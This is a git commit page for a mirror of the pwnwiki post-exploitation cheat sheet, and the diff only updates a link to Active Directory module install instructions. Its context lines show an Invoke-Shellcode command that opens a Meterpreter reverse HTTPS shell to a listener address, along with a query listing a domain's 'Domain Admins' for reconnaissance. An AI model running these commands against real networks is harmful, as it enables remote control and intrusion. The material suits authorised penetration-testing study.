mirror of
https://github.com/oXis/pwnwiki.github.io.git
synced 2025-10-29 16:56:59 +00:00
Updated install link
This commit is contained in:
parent
8d3fa87e12
commit
cccac5fc45
@ -69,7 +69,7 @@ Invoke-Shellcode -Payload windows/meterpreter/reverse_https -Lhost 192.168.1.10
|
|||||||
### Via https://www.trustedsec.com/uncategorized/powershell-reconnaissance/
|
### Via https://www.trustedsec.com/uncategorized/powershell-reconnaissance/
|
||||||
### Setting Credentials
|
### Setting Credentials
|
||||||
* **Command with arguments**: `$cred = Get-Credential`
|
* **Command with arguments**: `$cred = Get-Credential`
|
||||||
* **Notes**: These following commands require the Powershell Active Directory Modules to be installed. These can be downloaded for Win7 [here] (http://www.microsoft.com/en-us/download/details.aspx?id=7887)
|
* **Notes**: These following commands require the Powershell Active Directory Modules to be installed. Steps to install for Win7 are detailed [here] (http://blogs.msdn.com/b/rkramesh/archive/2012/01/17/how-to-add-active-directory-module-in-powershell-in-windows-7.aspx)
|
||||||
|
|
||||||
### Query to List "Domain Admins"
|
### Query to List "Domain Admins"
|
||||||
* **Command with arguments**: `Get-ADGroupMember -Credential $cred -server pwnt.com "Domain Admins"`
|
* **Command with arguments**: `Get-ADGroupMember -Credential $cred -server pwnt.com "Domain Admins"`
|
||||||
|
|||||||
Loading…
x
Reference in New Issue
Block a user